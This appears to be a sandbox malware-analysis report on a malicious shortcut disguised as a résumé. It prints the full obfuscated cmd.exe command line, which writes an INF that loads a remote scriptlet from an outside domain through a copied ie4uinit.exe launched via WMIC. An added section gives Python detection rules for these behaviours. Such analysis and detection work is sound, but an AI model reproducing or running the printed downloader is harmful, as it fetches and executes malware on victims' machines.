Windows Analysis Report
My Resume.lnk
Overview
General Information
Detection
Score: 84 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Windows shortcut file (LNK) starts blacklisted processes
Antivirus detection for URL or domain
Sigma detected: Copying Sensitive Files with Credential Data
Checks if browser processes are running
Creates processes via WMI
Obfuscated command line found
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to create processes via WMI
Windows shortcut file (LNK) contains suspicious strings
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
Found evasive API chain (date check)
Creates files inside the system directory
Sigma detected: Suspicious WMI Execution
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- cmd.exe (PID: 6920 cmdline:
  "C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && (for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\" && !VnLlYgV58278!et "VnLlYgV71257=!VnLlYgV5462!!VnLlYgV3504!" && set "VnLlYgV9155="^" && (for %j in ("[version]" "signature = !VnLlYgV4530!indows nt$" "[!VnLlYgV95863!e!VnLlYgV58278!tinationdirs]" "E1C3=01" "[!VnLlYgV95863!efaultin!VnLlYgV58278!tall.windows7]" "UnRegis!VnLlYgV89173!erOCXs=A52D05" "!VnLlYgV95863!elf!VnLlYgV81579!les=E1C3" "[A52D05]" "%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther!VnLlYgV33261!%VnLlYgV6563%/wmnxjogbfn" "[E1C3]" "ieu%VnLlYgV4681%!VnLlYgV8088!" "[!VnLlYgV58278!!VnLlYgV89173!rings]" "VnLlYgV4681=!VnLlYgV63461!" "VnLlYgV6931=t" "!VnLlYgV58278!ervicen!VnLlYgV0609!me=' '" "VnLlYgV0081=h" "VnLlYgV4892=:" "VnLlYgV64389=/" "!VnLlYgV58278!hortsvcn!VnLlYgV0609!me=' '" "VnLlYgV6563=com" "VnLlYgV2149=b") do @e!VnLlYgV49771!ho %~j)>"!VnLlYgV71257!" && !VnLlYgV58278!et "VnLlYgV5120=ie4u!VnLlYgV63461!.!VnLlYgV38371!xe" && call copy /Y %win!VnLlYgV95863!ir%\!VnLlYgV58278!ystem32\!VnLlYgV5120! "!VnLlYgV5462!" > nul && !VnLlYgV58278!t!VnLlYgV0609!rt "" /MIN wmi!VnLlYgV49771! proce!VnLlYgV58278!s call !VnLlYgV49771!rea!VnLlYgV89173!e "!VnLlYgV5462!!VnLlYgV5120! -base!VnLlYgV19376!
  MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  - conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - WMIC.exe (PID: 6268 cmdline: wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings" MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  - conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- ie4uinit.exe (PID: 6940 cmdline: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings MD5: 9DD77F0F421AA9A70383210706ECA529)
  - ie4uinit.exe (PID: 4788 cmdline: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache MD5: 9DD77F0F421AA9A70383210706ECA529)
  - rundll32.exe (PID: 2884 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
  - rundll32.exe (PID: 204 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
- cleanup
No configs have been found
No yara matches
System Summary
Sigma detected: Copying Sensitive Files with Credential Data (rule authors: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community)
Sigma detected: Suspicious WMI Execution (rule authors: Michael Haag, Florian Roth, juju4, oscd.community)
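The Sigma hit on WMI execution above, together with the process tree, gives three cheap process-creation checks: `wmic process call create`, `ie4uinit.exe` launched from anywhere but System32 or SysWOW64, and a `cmd.exe /v` line dense with `!name!` references and `set "` assignments. Below is an added example (this editor's code, not the report's and not the Sigma rules themselves) that runs those checks over constructed Sysmon-style events built from the tree, plus two benign controls. The field names, the directory allow-list and the threshold of five references are assumptions, and the obfuscation check is a heuristic to tune, not a published rule.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events mirroring the process tree
# in this report (the cmd.exe line is the opening part of the report's one),
# followed by two benign controls that must not match.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": (
        r'''"C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && '''
        r'''(for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && '''
        r'''set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && '''
        r'''set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && '''
        r'''set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && '''
        r'''call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\"''')},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"'},
    {"Image": r"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe",
     "CommandLine": r"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"},
    {"Image": r"C:\Windows\System32\ie4uinit.exe", "CommandLine": r"C:\Windows\System32\ie4uinit.exe -ClearIconCache"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r'"C:\Windows\System32\cmd.exe" /c dir'},
]

# Directories the real ie4uinit.exe ships in (assumed allow-list).
LEGIT_IE4UINIT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def wmic_process_create(e):
    """Core of the Sigma 'Suspicious WMI Execution' hit: wmic.exe spawning a process."""
    return (e["Image"].lower().endswith(r"\wmic.exe")
            and re.search(r"\bprocess\s+call\s+create\b", e["CommandLine"], re.I) is not None)


def ie4uinit_outside_system32(e):
    """A copy of ie4uinit.exe outside its home directories is the INF-loading LOLBin use."""
    p = PureWindowsPath(e["Image"])
    return p.name.lower() == "ie4uinit.exe" and str(p.parent).lower() not in LEGIT_IE4UINIT_DIRS


def delayed_expansion_obfuscation(e, min_refs=5):
    """Heuristic: cmd.exe with /v and many !name! references plus set "..." assignments."""
    cl = e["CommandLine"]
    return (e["Image"].lower().endswith(r"\cmd.exe")
            and re.search(r"\s/v(?::on)?\s", cl, re.I) is not None
            and len(re.findall(r"![A-Za-z0-9_]+!", cl)) >= min_refs
            and len(re.findall(r'\bset\s+"', cl, re.I)) >= min_refs)


RULES = {
    "Suspicious WMI Execution": wmic_process_create,
    "ie4uinit.exe outside System32": ie4uinit_outside_system32,
    "cmd delayed-expansion obfuscation": delayed_expansion_obfuscation,
}


def detect(events):
    """Return (rule name, image) for every event that a rule matches, in event order."""
    return [(name, e["Image"]) for e in events for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for name, image in detect(EVENTS):
        print(f"{name}: {image}")
```

The path check is the highest-fidelity of the three: the genuine binary only runs from System32 or SysWOW64, so any other parent directory is a copy made for this technique. The WMI check is broad on its own (administrators use `wmic process call create` too) and is best combined with the child image being in a user-writable path, as it is here.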
AV Detection
Source: Avira URL Cloud (7 URL/domain detections)
Code functions: 7_2_00007FF6B522763C, 7_2_00007FF6B522EA9C, 7_2_00007FF6B52256A4, 7_2_00007FF6B5227AC8, 7_2_00007FF6B522E950, 7_2_00007FF6B5222550, 7_2_00007FF6B522ED98, 7_2_00007FF6B5227DCC, 7_2_00007FF6B52225C0, 7_2_00007FF6B522544C, 7_2_00007FF6B52274BC, 7_2_00007FF6B522F108, 7_2_00007FF6B522E750, 7_2_00007FF6B5222B50, 7_2_00007FF6B522EFAC, 7_2_00007FF6B522EBE0, 7_2_00007FF6B52273D0, 7_2_00007FF6B522E80C